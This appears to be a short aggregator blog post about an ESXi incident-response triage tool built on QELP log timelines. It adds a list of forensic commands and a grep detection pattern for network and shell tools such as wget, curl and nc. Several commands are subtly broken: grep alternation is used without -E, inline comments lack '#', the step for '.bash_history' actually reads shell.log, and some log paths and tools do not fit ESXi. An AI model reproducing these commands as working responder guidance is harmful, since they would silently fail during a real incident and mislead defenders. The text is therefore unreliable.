Incident Response on ESXi: Rapid Triage and Analysis

By /

Listen to this Post

Featured Image
A utility has been developed to perform rapid triage and analysis of ESXi logs using timeline CSVs from QELP. This tool provides critical insights for incident responders working with ESXi environments.

Key Features:

  • Combined timeline of Bash activity, logons, and user actions.
  • Logon event timeline categorized by type, including user/IP correlations.
  • Summary reports on Bash history, network tool usage, and newly created users.

🔗 Download `qelp-ir-triage-esxi` here: https://lnkd.in/e2yrkBaE

You Should Know:

1. Extracting ESXi Logs for Analysis

To gather logs from an ESXi host for forensic analysis, use:

vim-cmd hostsvc/hosthardware | grep -i "serialNumber"  Get host info 
esxcli system syslog config get  Check syslog config 
esxcli system syslog mark --message="INCIDENT_START"  Mark logs for timeline

2. Parsing Bash History for Suspicious Activity

Check the `.bash_history` of users for malicious commands:

cat /var/log/shell.log | grep -i "wget|curl|nc|nmap|ssh"

3. Tracking User Logons and IPs

Extract authentication logs to detect brute-force attacks or unauthorized access:

grep -i "failed|accepted" /var/log/auth.log

4. Analyzing Network Connections

List active connections and suspicious ports:

esxcli network connection list | grep -v "ESTABLISHED|LISTEN"

5. Detecting New User Creation

Check for unauthorized user additions:

cat /etc/passwd | grep -i "home|bash"

6. Automating Log Collection with QELP

QELP helps convert ESXi logs into structured CSV timelines. Example command:

python3 qelp_parser.py -i /var/log -o timeline.csv

What Undercode Say:

ESXi servers are high-value targets for ransomware and lateral movement. Rapid log analysis is critical for identifying:
– Lateral movement via SSH/RDP logons.
– Malicious payloads delivered via curl/wget.
– Backdoor users created post-exploitation.

Expected Commands for Incident Response:

esxcli software vib list | grep -i "unverified"  Check unauthorized modules 
esxcli network firewall ruleset list  Review firewall exceptions 
vmware-cmd -l | xargs -n1 vmware-cmd -s getstate  List all VMs and status

Prediction:

As ESXi remains a prime target, automated IR tools like `qelp-ir-triage-esxi` will evolve to integrate YARA scanning and memory forensics for deeper threat detection.

Expected Output:

  • Structured CSV timelines of malicious activity.
  • Alert summaries on critical events (logons, Bash misuse).
  • Actionable IOCs (IPs, usernames, commands).

IT/Security Reporter URL:

Reported By: Cudeso Incident – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram

Related Posts: